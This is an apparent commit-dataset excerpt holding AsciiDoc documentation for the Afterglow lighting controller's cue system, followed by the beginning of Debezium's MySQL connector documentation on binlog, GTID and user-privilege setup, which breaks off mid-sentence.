true value, requests that the function value be\n adjusted by aftertouch pressure while the operator is holding down\n the button or pad which launched the cue, on controllers which have\n pressure sensitivity.\n\n|`:aftertouch-min`\n|`0`\n\n|If present (and `:aftertouch` is active), specifies the smallest\n value the function should be set to by MIDI aftertouch pressure. If\n not specified, `0` is used, which corresponds to the lowest legal\n DMX value the fixture definition identifies for the function.\n\n|`:aftertouch-max`\n|`100`\n\n|If present (and `:aftertouch` is active), specifies the largest value\n the variable should be set to by MIDI aftertouch pressure. If not\n specified, `100` is used, which corresponds to the highest legal DMX\n value the fixture definition identifies for the function.\n\n|===\n\n[[controlling-cues]]\n== Controlling Cues\n\nThe\nhttp:\/\/deepsymmetry.org\/afterglow\/doc\/afterglow.controllers.html[afterglow.controllers]\nnamespace defines some helpful functions for working with cues, and\ndefines a\nhttp:\/\/deepsymmetry.org\/afterglow\/doc\/afterglow.controllers.html#var-IGridController[grid\ncontroller protocol] which rich controller mappings, like the one for\nthe <<mapping_sync#using-ableton-push,Ableton Push>>, use to attach\nthemselves to a running show, and synchronize with the web interface.\n\nIf you are implementing a new grid controller mapping, you will want\nto study that protocol, and will likely find the Ableton Push mapping\na useful example and starting point for your own work. (And please,\nwhen you are done, submit a pull request to add your implementation to\nAfterglow!)\n\nWhen you are setting up the cue grid for your show, you will use\nhttp:\/\/deepsymmetry.org\/afterglow\/doc\/afterglow.controllers.html#var-set-cue.21[set-cue!]\nto arrange the cues you want it to contain. The\nhttp:\/\/deepsymmetry.org\/afterglow\/doc\/afterglow.examples.html#var-make-cues[make-cues]\nfunction in the examples namespace contains a lot of examples of doing\nthis. As cues are added to the grid, its dimensions are updated, and\nthe web interfaces and any registered grid controllers will\nimmediately reflect the new cue and dimensions.\n\nYou can remove a cue from the grid with\nhttp:\/\/deepsymmetry.org\/afterglow\/doc\/afterglow.controllers.html#var-clear-cue.21[clear-cue].\n\nThe rest of the functions in the `afterglow.controllers` namespace are used by\ncontroller implementations and running shows to mediate their\ninteractions with the cue grid; dig into them if you are writing code\nin those spaces.\n","old_contents":"= Cues\nJames Elliott <james@deepsymmetry.org>\n:icons: font\n\n\/\/ Set up support for relative links on GitHub; add more conditions\n\/\/ if you need to support other environments and extensions.\nifdef::env-github[:outfilesuffix: .adoc]\n\nCues are designed to support creating user interfaces for controlling\neffects. They provide a convenient way to organize, identify, trigger,\nadjust, and monitor effects. Each\nhttp:\/\/deepsymmetry.org\/afterglow\/doc\/afterglow.show.html[show] in\nAfterglow maintains a cue grid, which can be viewed and interacted\nwith through the <<README#the-embedded-web-interface,embedded web\ninterface>> and MIDI controller mapping implementations which can be\nhttp:\/\/deepsymmetry.org\/afterglow\/doc\/afterglow.show.html#var-register-grid-controller[registered\nas grid controllers], like the <<mapping_sync#using-ableton-push,Ableton Push>>.\n\nThe cue grid is a two dimensional arrangement of cues, where the\nbottom left corner is assigned coordinates `(0, 0)`. X coordinates\nincrease from left to right, and Y coordinates increase from bottom to\ntop. The web interface and registered grid controllers display 64 cues\nat a time in an 8×8 grid, and can be scrolled around that grid.\nThe user can configue (“link”) the web interface to track\nthe scroll position of a registered grid controller. When that is\ndone, scrolling either interface will cause the other to scroll in the\nsame way, so the browser window can act as documentation to help the\nuser learn the cue names associated with each available cue pad on the\ncontroller.\n\nimage::assets\/ShowGrid.png[Web interface]\n\nIn addition to names, cues can be assigned colors in the grid, and the\nweb interface will honor those colors, as will the physical grid\ncontrollers, within the limits of their capabilities. To provide\nfeedback about cue activation, a lightened version of the cue color is\ndisplayed for cues which are currently active. And to help inform the\nuser about cue compatibility, any cues which are assigned the same\neffect keyword, meaning they will terminate each other when launched,\nwill be displayed in a darkened color if an effect with that keyword\nis currently running. Examples of both of these can be seen in the\nfirst column of cues above, in which the “All Dimmers” cue\nis active and displaying a lightened version of the yellow color\nassigned to it, and the two cues above it, “All Saw Down\nBeat” and “All Saw Up 2 Beat” use the same keyword\nand color, and so are displaying a darkened version of the yellow\ncolor. This is a useful technique for building easy-to-learn cue\ngrids. The same cues are shown on the Ableton Push below, so you can\nsee how the color relationships help with learning the cue names.\n\nimage::assets\/AbletonInterface.jpg[Ableton Push interface]\n\nTo trigger a cue, simply press the corresponding pad on a physical\ninterface, or click within the grid cell in the web interface. The\neffect associated with the cue will be created and added to the show,\nand the grid cell will be lightened to indicate that the cue's\neffect is running. If the cue ends itself after a period, the grid\ninterface will be updated to reflect that as well.\n\nTo end a cue's effect before it would naturally end (or because\nit is open-ended and does not end until asked to), simply press the\npad corresponding to the running cue (or, again, click the grid cell\nin the web interface). The effect will be asked to end. Some effects\nend instantly, which will be refleced by the cue grid cell returning\nto its normal color. Some effects have a delayed ending, so they can\nfade out, or finish some musically relevant sequence. If this is\nhappening, the grid cell will blink while the effect ends, and then\nstay at its normal color once the effect finishes ending. If you want\nthe effect to end immediately you can press the pad one more time\nwhile the effect is performing its gradual ending, and it will be\nkilled at that point, regardless of how much longer it was planning to\nrun.\n\n[[held-flag]]Cues can also be created which run only as long as the\ncorresponding controller pad is held down (this is done by passing a\ntrue value with the `:held` optional keyword argument when creating\nthe cue). This is often done for intense effects like strobes.\n\nCues can also offer pressure sensitivity on controllers which support\nthis (like the Ableton Push). For such cues, one or more variable used\nby the cue can be updated by the aftertouch pressure exerted by the\noperator as they hold down the pad. This can make for very expressive\neffects, as exemplified by the Sparkle cue set up early in the\nexamples namespace's\nhttp:\/\/deepsymmetry.org\/afterglow\/doc\/afterglow.examples.html#var-make-cues[make-cues]\nfunction, and its\nhttp:\/\/deepsymmetry.org\/afterglow\/doc\/afterglow.examples.html#var-make-strobe-cue[strobe]\ncues. Of course, this pressure sensitivity is not possible with the\nweb cue grid.\n\nThe interface for moving around the cue grid is the diamond of arrows\nat the bottom right of both the web interface and the Ableton Push. If\nthere are more cues available in a particular direction, that arrow is\nlit, otherwise it is dark. For the cues pictured above, the bottom\nleft corner of the cue grid is being displayed, and there are more\ncues above and to the right, so the up and right scroll arrows are\nlit. Pressing an arrow scrolls to the next set of eight rows or\ncolumns in that direction. (And if the web view is linked to a grid\ncontroller, pressing the arrow on either will scroll both. For\nphysical grid controllers which lack scroll buttons, linking them to\nthe web interface is the most practical way of scrolling them.)\n\nCues can also be triggered from simpler MIDI controllers (which\ndon't register as grid controllers) by explicitly mapping notes\nor control changes sent by the controller to cues within the grid\nusing\nhttp:\/\/deepsymmetry.org\/afterglow\/doc\/afterglow.show.html#var-add-midi-control-to-cue-mapping[afterglow.show\/add-midi-control-to-cue-mapping].\nRegardless of the mechanism by which a cue is triggered, the web\ninterface, a registered grid controller, or an explicitly mapped MIDI\nnote or control change, feedback will be sent to all interfaces so the\nstatus of the cue will be represented consistently on all of them. And\na cue triggered on one controller can be ended on any other controller\nby simply pressing the lit button or clicking the lit cell there.\n\nFor example, to be able to trigger the Sparkle cue, which the examples\nnamespace places at `(0, 7)` within the sample show cue grid, by\npressing the bottom leftmost button on my inexpensive Korg nanoKontrol\n2 MIDI controller, after using\nhttp:\/\/deepsymmetry.org\/afterglow\/doc\/afterglow.midi.html#var-identify-mapping[afterglow.midi\/identify-mapping]\nto determine that the button sends control-change messages for\ncontroller number `43`, I can simply evaluate:\n\n[source,clojure]\n----\n(show\/add-midi-control-to-cue-mapping \"nano\" 0 :control 43 0 7)\n----\n\nNow I can press the top-left pad on the Push, click the top left cell\nin the Web interface, or press that button on the nanoKontrol, and the\nSparkle cue lights up on all three interfaces, and the effect runs and\nsparkles the lights.\n\n[NOTE]\n====\n\nIn order to enable Afterglow to send feedback about cue status to the\nlights on the nanoKontrol I needed to use the Korg Kontrol Editor to\nset its LED Mode to _External_ (as shipped, they were in _Internal_\nmode, and lit themselves when held down). Most MIDI controllers are\nlikely to need similar configuration to work as feedback-capable cue\ncontrollers with Afterglow, but most I have seen do offer\nconfiguration tools to enable this kind of external control.\n\n====\n\n[[creating-cues]]\nCreating Cues\n~~~~~~~~~~~~~\n\nThe\nhttp:\/\/deepsymmetry.org\/afterglow\/doc\/afterglow.effects.cues.html[afterglow.effects.cues]\nnamespace provides functions for creating cues. Unsurprisingly, the\nhttp:\/\/deepsymmetry.org\/afterglow\/doc\/afterglow.effects.cues.html#var-cue[cue]\nfunction creates a cue. At its most basic, you pass in two parameters,\n`show-key` which is the keyword that will be used to add the\ncue's effect to the show when the cue is triggered, ending any\nother effect running under that same keyword, and `effect`, which is a\nfunction that will be called when the cue is triggered, and whose\nresponsibility is to create and return the effect that the cue should\nadd to the show. This is done so that a fresh instance of the effect\nis used each time the cue is triggered, in case the effect is complex\nand maintains its own state. The effect creation function will be\npassed a map containing any <<cues#cue-variables,cue-specific variable bindings>>.\n\nNOTE: For the very common case of wanting to create a cue to activate\na fixture-specific _function_ (capability), and perhaps adjust the\nfunction's activation level while it runs, you can instead call the\nspecial-purpose `function-cue` described\n<<cues#creating-function-cues,below>>.\n\nThere are a number of optional keyword parameters which can be used to\nmodify the cue that is created. Remember that you can also consult the\nhttp:\/\/deepsymmetry.org\/afterglow\/doc\/afterglow.effects.cues.html#var-cue[API\ndocumentation] for another explanation of these functions, and for\nlinks to examine the source code, which is the most authoritative\nexplanation of how they work, and can offer inspiration for variations\nthat you might want to create yourself.\n\n[cols=\"1a,1a,5a\", options=\"header\"]\n.Keyword parameters to `cue`\n|===\n|Parameter\n|Default\n|Purpose\n\n|`:short-name`\n|effect name\n\n|Sets the text to be displayed for the cue in the web cue grid, and in\nthe text display of the controller (if it has one) when the cue is\nrunning. If you don't supply a short name, the name of the\neffect created by the `effect` function is used, but that may be too\nlong or not informative enough.\n\n|`:color`\n|white\n\n|Sets the color of the cue within the grid for hinting about its\npurpose and relatedness to other cues, to help operators learn and\nunderstand the interface. If not specified, white is used.\n\n|`:end-keys`\n|none\n\n|A list of keywords that identify additional effects to be ended when\nlaunching this cue. See the dimmer cue section of\nhttp:\/\/deepsymmetry.org\/afterglow\/doc\/afterglow.examples.html#var-make-cues[make-cues]\nfor an example of how this can be helpful: it sets up a couple of rows\nof dimmer cues where the leftmost affects all the dimmers in the\nlighting rig, and cancels all the cues that work on individual light\ngroups, while the individual light group dimmer cues cancel the\nall-dimmers cues, but leave the dimmer cues for other light groups\nalone.\n\n|`:priority`\n|`0`\n\n|Sets the effect priority used when adding the cue's effect to the\nshow. This can be used to make sure the effect runs before or after\nother effects in the <<rendering_loop#the-rendering-loop,rendering\nloop>>. Effects are run in order, and later effects can modify or\noverride the results of earlier ones, like the way the Sparkle effect\nin\nhttp:\/\/deepsymmetry.org\/afterglow\/doc\/afterglow.examples.html#var-make-cues[make-cues]\nis assigned a priority of 100 so it sorts after any chase which may be\nrunning, and its sparkles can lighten the color which would otherwise\nbe present in their fixtures.\n\n|`:held`\n|`false`\n\n|As described <<cues#held-flag,above>>, causes the cue's effect to run\nonly as long as the corresponding controller button or pad is held\ndown, if the controller supports that capability. All current\ncontroller implementations, including the web interface, the\n<<mapping_sync#using-ableton-push,Ableton Push mapping>>, and mappings\nto generic MIDI controllers created using\nhttp:\/\/deepsymmetry.org\/afterglow\/doc\/afterglow.show.html#var-add-midi-control-to-cue-mapping[afterglow.show\/add-midi-control-to-cue-mapping],\ndo honor this setting. The web interface and controllers like the\nPush, which can vary the color of cue grid cells, will provide\nfeedback that a cue will last only as long as it is held by displaying\na whitened version of the cue color while it is held down.\n\nShow operators can override the `:held` flag by holding down the\n`Shift` key when triggering the cue on interfaces which have `Shift`\nkeys (like the web interface and Ableton Push). This will cause the\ncue to run until the corresponding pad or grid cell is pressed again,\nand will not whiten the cue color while it is held down.\n\n|`:variables`\n|none\n\n|Specifies a sequence of show variable bindings that\ncan be used by the cue's effect. Each variable specification is a map,\nwhose content is described in the following table. These\nspecifications are used to create any necessary new variables, and a\nmap describing any cue-local variables is passed to the `effect`\nfunction when the cue is triggered, so they can be used as needed when\ncreating the cue's effect.\n\n|===\n\n[cols=\"1a,1a,5a\", options=\"header\"]\n.[[cue-variables]]Cue variable specification maps\n|===\n|Key\n|Default\n|Purpose\n\n|`:key`\n|_n\/a_\n\n|Identifies the variable that is being bound to the cue. This can\n either be a keyword, and refer to an existing show variable (set\n using\n http:\/\/deepsymmetry.org\/afterglow\/doc\/afterglow.show.html#var-set-variable.21[afterglow.show\/set-variable!]),\n or a string, meaning that a new variable should be introduced for the\n cue. The actual name of this new variable will be assigned when the\n cue is activated. In order for the effect to be able to access the\n correct variable, a map is passed to the `effect` function that\n creates the cue's effect. Within this map, the keys are keywords\n created from the strings passed as `:key` values in the cue's\n variable specification maps, and the corresponding values are the\n keyword of the variable that was created for the cue to go with that\n key. An example of using such cue-local variables can be found in the\n source of the\n http:\/\/deepsymmetry.org\/afterglow\/doc\/afterglow.examples.html#var-make-strobe-cue[make-strobe-cue]\n example, for the variable `level`. That cue also makes use of the\n independent show variable `:strobe-lightness` which is set by a\n separate `adjust-strobe` cue running the effect\n http:\/\/deepsymmetry.org\/afterglow\/doc\/afterglow.effects.fun.html#var-adjust-strobe[afterglow.fun\/adjust-strobe],\n forming an interesting demonstration of interacting cues.\n\n|`:start`\n|`nil`\n\n|Specifies the value to assign when creating the cue-local variable.\n Applies only when the value at `:key` is a string rather than a\n keyword, so a variable is being created just for the cue.\n\n|`:name`\n|variable name\n\n|Provides a name to identify the variable in the web interface and in\n the text area of physical controllers which provide a labeled\n interface for adjusting running effects, like the Ableton Push. If no\n name is supplied, the name of the value passed with `:key` is used;\n provide `:name` in cases where that would be insufficiently\n descriptive.\n\n|`:short-name`\n|none\n\n|If present, gives a shorter version of `:name` to be used in\n interfaces with limited space.\n\n|`:min`\n|`0`\n\n|Specifies the smallest value that the variable can be adjusted to, for\n interfaces which support adjustment of cue variables while the cue is\n running. If not supplied, the minimum value will be zero.\n\n|`:max`\n|`100`\n\n|Specifies the largest value that the variable can be adjusted to, for\n interfaces which support adjustment of cue variables while the cue is\n running. If not supplied, the maximum value will be one hundred.\n\n|`:type`\n|`:float`\n\n|Provides a hint for how the variable should be formatted in\n adjustment interfaces. Supported values are `:integer` and `:float`.\n Others may be added in the future. If not provided (or an\n unrecognized value is provided), the variable is assumed to hold\n floating-point values.\n\n|`:centered`\n|`false`\n\n|Requests that variable adjustment interfaces which draw a graphical\n representation of the current value within its range display this\n variable as a deviation from a central value, rather than something\n growing from the left, if they have such options.\n\n|`:resolution`\n|_varies_\n\n|Specifies the smallest amount by which the variable should be\n adjusted when the user is turning a continuous encoder knob. If not\n specified, the controller implementation gets to decide what to do.\n The recommended default resolution is no larger then 1\/256 of the\n range from `:min` to `:max`.\n\n|`:aftertouch`\n|`false`\n\n|If present, with a true value, requests that the variable value be\n adjusted by aftertouch pressure while the operator is holding down\n the button or pad which launched the cue, on controllers which have\n pressure sensitivity.\n\n|`:aftertouch-min`\n|`:min`\n\n|If present (and `:aftertouch` is active), specifies the smallest\n value the variable should be set to by MIDI aftertouch pressure. If\n not specified, the standard `:min` value is used.\n\n|`:aftertouch-max`\n|`:max`\n\n|If present (and `:aftertouch` is active), specifies the largest\n value the variable should be set to by MIDI aftertouch pressure. If\n not specified, the standard `:max` value is used.\n\n|===\n\n\n[[creating-function-cues]]\nCreating Function Cues\n~~~~~~~~~~~~~~~~~~~~~~\n\nOften you want a cue to activate a specific feature of a fixture\n(often described as a _function_ in the fixture manual, and in the\nfixture definition within Afterglow, which can unfortunately get\nconfusing when we are talking about invoking Clojure functions). To\nmake it easy to work with such fixture capabilities, the\n`afterglow.effects.cues` namespace also offers the\nhttp:\/\/deepsymmetry.org\/afterglow\/doc\/afterglow.effects.cues.html#var-function-cue[function-cue]\nfunction. It is quite similar to the `cue` function described\n<<cues#creating-cues,above>>, but it takes care of creating the effect\nfor you, given the function name you want to apply to a fixture or set\nof fixtures. You can even apply the function to fixtures from\ndifferent manufactures, regardless of whether they implement it on\ndifferent channels and with different value ranges. If it has been\nassigned the same function name (such as, for example, `:strobe`),\nAfterglow will find it in each fixture definition, and send the right\nvalues to each fixture.\n\nNOTE: Function cues are able to figure out how to do the right thing\nfor each fixture because they can scan the fixture definitions for\n<<fixture_definitions#function-specifications,Function Specifications>>\nmatching the keyword you gave when creating the cue. When you patch a\nfixture into a show, Afterglow indexes its function ranges in order to\nmake this efficient.\n\n`function-cue` also automatically creates a temporary cue-local\nvariable for <<mapping_sync#effect-control,adjusting>> the function\nlevel if the function is not fixed over its range. This makes it\nessentially a one-liner to create a button in your cue grid which\nactivates a function and then, if your controller supports it, lets\nyou tweak that function while is running. Examples include the Torrent\ngobo, focus, and prism cues created by\nhttp:\/\/deepsymmetry.org\/afterglow\/doc\/afterglow.examples.html#var-make-cues[make-cues].\n\nMinimally, `function-cue` requires three parameters: `show-key` which\nis the keyword that will be used to add the cue's effect to the show\nwhen the cue is triggered, ending any other effect running under that\nsame keyword, `function`, which is the keyword identifying the\nfixture-specific capability that you want the cue to activate and\ncontrol, as defined in the fixture definition, and `fixtures`, which\nis the list of fixtures or heads that you want the cue to affect.\n(Only fixtures and heads which actually support the specified function\nwill be affected by the cue.)\n\nThere are a number of optional keyword parameters which can be used to\nmodify the cue that is created, and are described below. See the\nhttp:\/\/deepsymmetry.org\/afterglow\/doc\/afterglow.effects.cues.html#var-function-cue[API\ndocumentation] for more details.\n\n[cols=\"1a,1a,5a\", options=\"header\"]\n.Keyword parameters to `function-cue`\n|===\n|Parameter\n|Default\n|Purpose\n\n|`:effect-name`\n|function name\n\n|Sets the name to assign the effect created by the cue. If none is\n provided, the name of the `function` keyword is used.\n\n|`:short-name`\n|none\n\n|Can be used to provide a shorter name to be displayed for the cue in\nthe web cue grid, and in the text display of the controller (if it has\none) when the cue is running.\n\n|`:color`\n|white\n\n|Sets the color of the cue within the grid for hinting about its\npurpose and relatedness to other cues, to help operators learn and\nunderstand the interface. If not specified, white is used.\n\n|`:level`\n|`0`\n\n|If provided, and the function supports a range of values with\n different meanings (such as a focus range, movement speed, or the\n like), sets the initial level to assign the function, and to the\n variable which will be introduced to allow the function value to be\n adjusted while the cue runs. Functions with no variable effect will\n ignore `:level`, and will have no cue-specific variables created for\n them. The level is treated as a percentage, where 0 is mapped to the\n lowest legal DMX value that activates the function, and 100 is mapped\n to the highest.\n\n|`:htp`\n|`false`\n\n|If supplied along with a true value, causes the effect that is\n created for this cue to operate with _highest-takes-precedence_ rules\n with respect to any other effect which has already assigned a value\n for this function. Otherwise, the effect will simply discard any\n previous assignments, replacing them with its own regardless of their\n value.\n\n|`:end-keys`\n|none\n\n|A list of keywords that identify additional effects to be ended when\nlaunching this cue. See the dimmer cue section of\nhttp:\/\/deepsymmetry.org\/afterglow\/doc\/afterglow.examples.html#var-make-cues[make-cues]\nfor an example of how this can be helpful: it sets up a couple of rows\nof dimmer cues where the leftmost affects all the dimmers in the\nlighting rig, and cancels all the cues that work on individual light\ngroups, while the individual light group dimmer cues cancel the\nall-dimmers cues, but leave the dimmer cues for other light groups\nalone.\n\n|`:priority`\n|`0`\n\n|Sets the effect priority used when adding the cue's effect to the\nshow. This can be used to make sure the effect runs before or after\nother effects in the <<rendering_loop#the-rendering-loop,rendering\nloop>>. Effects are run in order, and later effects can modify or\noverride the results of earlier ones, like the way the Sparkle effect\nin\nhttp:\/\/deepsymmetry.org\/afterglow\/doc\/afterglow.examples.html#var-make-cues[make-cues]\nis assigned a priority of 100 so it sorts after any chase which may be\nrunning, and its sparkles can lighten the color which would otherwise\nbe present in their fixtures.\n\n|`:held`\n|`false`\n\n|As described <<cues#held-flag,above>>, causes the cue's effect to run\nonly as long as the corresponding controller button or pad is held\ndown, if the controller supports that capability. All current\ncontroller implementations, including the web interface, the\n<<mapping_sync#using-ableton-push,Ableton Push mapping>>, and mappings\nto generic MIDI controllers created using\nhttp:\/\/deepsymmetry.org\/afterglow\/doc\/afterglow.show.html#var-add-midi-control-to-cue-mapping[afterglow.show\/add-midi-control-to-cue-mapping],\ndo honor this setting. The web interface and controllers like the\nPush, which can vary the color of cue grid cells, will provide\nfeedback that a cue will last only as long as it is held by displaying\na whitened version of the cue color while it is held down.\n\nShow operators can override the `:held` flag by holding down the\n`Shift` key when triggering the cue on interfaces which have `Shift`\nkeys (like the web interface and Ableton Push). This will cause the\ncue to run until the corresponding pad or grid cell is pressed again,\nand will not whiten the cue color while it is held down.\n\n|`:aftertouch`\n|`false`\n\n|If present, with a true value, requests that the function value be\n adjusted by aftertouch pressure while the operator is holding down\n the button or pad which launched the cue, on controllers which have\n pressure sensitivity.\n\n|`:aftertouch-min`\n|`0`\n\n|If present (and `:aftertouch` is active), specifies the smallest\n value the function should be set to by MIDI aftertouch pressure. If\n not specified, `0` is used, which corresponds to the lowest legal\n DMX value the fixture definition identifies for the function.\n\n|`:aftertouch-max`\n|`100`\n\n|If present (and `:aftertouch` is active), specifies the largest value\n the variable should be set to by MIDI aftertouch pressure. If not\n specified, `100` is used, which corresponds to the highest legal DMX\n value the fixture definition identifies for the function.\n\n|===\n\n[[controlling-cues]]\nControlling Cues\n~~~~~~~~~~~~~~~~\n\nThe\nhttp:\/\/deepsymmetry.org\/afterglow\/doc\/afterglow.controllers.html[afterglow.controllers]\nnamespace defines some helpful functions for working with cues, and\ndefines a\nhttp:\/\/deepsymmetry.org\/afterglow\/doc\/afterglow.controllers.html#var-IGridController[grid\ncontroller protocol] which rich controller mappings, like the one for\nthe <<mapping_sync#using-ableton-push,Ableton Push>>, use to attach\nthemselves to a running show, and synchronize with the web interface.\n\nIf you are implementing a new grid controller mapping, you will want\nto study that protocol, and will likely find the Ableton Push mapping\na useful example and starting point for your own work. (And please,\nwhen you are done, submit a pull request to add your implementation to\nAfterglow!)\n\nWhen you are setting up the cue grid for your show, you will use\nhttp:\/\/deepsymmetry.org\/afterglow\/doc\/afterglow.controllers.html#var-set-cue.21[set-cue!]\nto arrange the cues you want it to contain. The\nhttp:\/\/deepsymmetry.org\/afterglow\/doc\/afterglow.examples.html#var-make-cues[make-cues]\nfunction in the examples namespace contains a lot of examples of doing\nthis. As cues are added to the grid, its dimensions are updated, and\nthe web interfaces and any registered grid controllers will\nimmediately reflect the new cue and dimensions.\n\nYou can remove a cue from the grid with\nhttp:\/\/deepsymmetry.org\/afterglow\/doc\/afterglow.controllers.html#var-clear-cue.21[clear-cue].\n\nThe rest of the functions in the `afterglow.controllers` namespace are used by\ncontroller implementations and running shows to mediate their\ninteractions with the cue grid; dig into them if you are writing code\nin those spaces.\n","returncode":0,"stderr":"","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"7b48ebbac85cd1660a20ee76206d2f57a41115a7","subject":"Update documentation to explicit authorized value of lenght for column.mask.with.length.chars","message":"Update documentation to explicit authorized value of lenght for column.mask.with.length.chars\n","repos":"debezium\/debezium.github.io,debezium\/debezium.github.io,debezium\/debezium.github.io","old_file":"docs\/connectors\/mysql.asciidoc","new_file":"docs\/connectors\/mysql.asciidoc","new_contents":"= Debezium Connector for MySQL\n:awestruct-layout: doc\n:toc:\n:toc-placement: macro\n:linkattrs:\n:icons: font\n:source-highlighter: highlight.js\n\ntoc::[]\n\nDebezium's MySQL Connector can monitor and record all of the row-level changes in the databases on a MySQL server or HA MySQL cluster. The first time it connects to a MySQL server\/cluster, it reads a consistent snapshot of all of the databases. When that snapshot is complete, the connector continuously reads the changes that were committed to MySQL 5.6 or later and generates corresponding insert, update and delete events. All of the events for each table are recorded in a separate Kafka topic, where they can be easily consumed by applications and services.\n\nAs of Debezium 0.4.0, this connector adds preliminary support for https:\/\/aws.amazon.com\/rds\/mysql\/[Amazon RDS] and https:\/\/aws.amazon.com\/rds\/aurora\/[Amazon Aurora (MySQL compatibility)]. However, due to limitations of these hosted forms of MySQL, the connector retains locks during an initial consistent snapshot link:#snapshots-without-global-read-locks[for the duration of the snapshot].\n\n[[overview]]\n== Overview\n\nMySQL's http:\/\/dev.mysql.com\/doc\/refman\/5.7\/en\/binary-log.html[_binary log_], or _binlog_, records all operations in the same order they are committed by the database, including changes to the schemas of tables or changes to data stored within the tables. MySQL uses its binlog for replication and recovery.\n\nDebezium's MySQL connector reads MySQL's binary log to understand what and in what order data has changed. It then produces a _change event_ for every row-level insert, update, and delete operation in the binlog, recording all the change events for each table in a separate Kafka topic. Your client applications read the Kafka topics that correspond to the database tables it's interested in following, and react to every row-level event it sees in those topics.\n\nMySQL is usually set up to purge the binary logs after some period of time. This means that the binary log won't have the complete history of all changes that have been made to the database. Therefore, when the MySQL connector first connects to a particular MySQL sever or cluster, it starts by performing a link:#snapshot[_consistent snapshot_] of each of the databases. When the connector completes the snapshot, it then starts reading the binlog from the exact point at which the snapshot was made. This way, we start with a consistent view of all of the data, yet continue reading without having lost any of the changes made while the snapshot was being made.\n\nThe connector is also very tolerant of failures. As the connector reads the binlog and produces events, it records the binlog position with each event. If the connector stops for any reason (including communication failures, network problems, or crashes), upon restart it simply continues reading the binlog where it last left off. This includes snapshots: if the snapshot was not completed when the connector is stopped, upon restart it will begin a new snapshot. We'll talk later about how the connector behaves link:#when-things-go-wrong[when things go wrong].\n\n\n[[setting-up-mysql]]\n== Setting up MySQL\n\nBefore the Debezium MySQL connector can be used to monitor the changes committed on a MySQL server, the server must be set up to use _row-level binary logging_ and have a database user with appropriate privileges. If MySQL is configured to use global transaction identifiers (GTIDs), then the Debezium connector can more easily reestablish connection should one of the MySQL servers fail.\n\nThe following sections outline in more detail how to set up these features in MySQL.\n\n[[enabling-the-binlog]]\n=== Enabling the binlog\n\nThe MySQL server must be configured to use a _row-level_ binary log, which is described in more detail in the http:\/\/dev.mysql.com\/doc\/refman\/5.7\/en\/replication-options.html[MySQL documentation]. This is most often done in the MySQL server configuration file, and will look similar to the following fragment:\n\n[source]\n----\nserver-id = 223344\nlog_bin = mysql-bin\nbinlog_format = row\nbinlog_row_image = full\nexpire_logs_days = 10\n----\n\nwhere:\n\n* the value for http:\/\/dev.mysql.com\/doc\/refman\/5.7\/en\/server-system-variables.html#sysvar_server_id[`server-id`] must be unique for each server and replication client within the MySQL cluster. When we set up the connector, we'll also assign the connector a unique server ID.\n* the value for http:\/\/dev.mysql.com\/doc\/refman\/5.7\/en\/replication-options-binary-log.html#sysvar_log_bin[`log_bin`] is the base name for the sequence of binlog files.\n* the value for http:\/\/dev.mysql.com\/doc\/refman\/5.7\/en\/replication-options-binary-log.html#sysvar_binlog_format[`binlog_format`] must be set to `row` or `ROW`.\n* the value for https:\/\/dev.mysql.com\/doc\/refman\/5.7\/en\/replication-options-binary-log.html#sysvar_binlog_row_image[`binlog_row_image`] must be set to `full` or `FULL`.\n* the value for http:\/\/dev.mysql.com\/doc\/refman\/5.7\/en\/server-system-variables.html#sysvar_expire_logs_days[`expire_log_days`] is the number of days for automatic binary log file removal. The default is 0, which means \"no automatic removal,\" so be sure to set a value that is appropriate for your environment.\n\n[TIP]\n====\nRunning a MySQL server with binary logging enabled does slightly reduce performance of the MySQL server, but the benefits generally outweigh the costs. Each binlog reader will also place a small load on the server, so using Debezium is a great way to minimize this load while providing the change events to a large variety and number of consumers.\n====\n\n[[enabling-gtids]]\n[[enabling-gtids-optional]]\n=== Enabling GTIDs (optional)\n\nThe MySQL server can be configured to use https:\/\/dev.mysql.com\/doc\/refman\/5.6\/en\/replication-gtids.html[GTID-based replication]. Global transaction identifiers, or GTIDs, were introduced in MySQL 5.6.5, and they uniquely identify a transaction that occurred on a particular server within a cluster. Using GTIDs greatly simplifies replication and makes it possible to easily confirm whether masters and slaves are consistent. *Note that if you're using an earlier version of MySQL, you will not be able to enable GTIDs.*\n\nEnabling GTIDs can be done in the MySQL server configuration file, and will look similar to the following fragment:\n\n[source]\n----\ngtid_mode = on\nenforce_gtid_consistency = on\n----\n\nwhere:\n\n* the value for https:\/\/dev.mysql.com\/doc\/refman\/5.6\/en\/replication-options-gtids.html#option_mysqld_gtid-mode[`gtid_mode`] specifies the GTID mode of the MySQL server.\n* the value for https:\/\/dev.mysql.com\/doc\/refman\/5.6\/en\/replication-options-gtids.html[`enforce_gtid_consistency`] instructs the server to enforce GTID consistency by allowing execution of only those statements that can be logged in a transactionally safe manner, and is required when using GTIDs.\n\nConsult the https:\/\/dev.mysql.com\/doc\/refman\/5.6\/en\/replication-options-gtids.html#option_mysqld_gtid-mode[MySQL documentation] for details and specifics about setting up GTIDs.\n\n[TIP]\n====\nThe MySQL connector does not require MySQL to use GTIDs and GTID-based replication. Each time the connector starts up, it will automatically detect whether it is enabled and adjust its behavior accordingly.\n====\n\n[[enabling-query-log-events]]\n[[enabling-query-log-events-optional]]\n=== Enabling Query Log Events (optional)\n\nStarting with MySQL 5.6 row based replication can be configured to include the original SQL statement with each binlog event. *Note that if you're using an earlier version of MySQL, you will not be able to enable this feature.*\n\nEnabling this option can be done in the MySQL server configuration file, and will look similar to the following fragment:\n\n[source]\n----\nbinlog_rows_query_log_events = on\n----\n\nwhere:\n\n* the value for https:\/\/dev.mysql.com\/doc\/refman\/5.7\/en\/replication-options-binary-log.html#sysvar_binlog_rows_query_log_events[`binlog_rows_query_log_events`] can be set to `on` or `ON` to enable support for including the original SQL statement in the binlog entry.\n\n[[mysql-user]]\n[[create-a-mysql-user-for-the-connector]]\n=== Create a MySQL user for the connector\n\nA MySQL user must be defined that has all of the following permissions on all of the databases that the connector will monitor:\n\n* http:\/\/dev.mysql.com\/doc\/refman\/5.7\/en\/privileges-provided.html#priv_select[`SELECT`] - enables the connector to select rows from tables in databases; used only when performing a snapshot\n* http:\/\/dev.mysql.com\/doc\/refman\/5.7\/en\/privileges-provided.html#priv_reload[`RELOAD`] - enables the connector of the http:\/\/dev.mysql.com\/doc\/refman\/5.7\/en\/flush.html[`FLUSH`] statement to clear or reload various internal caches, flush tables, or acquire locks; used only when performing a snapshot\n* http:\/\/dev.mysql.com\/doc\/refman\/5.7\/en\/privileges-provided.html#priv_show-databases[`SHOW DATABASES`] - enables the connector to see database names by issuing the 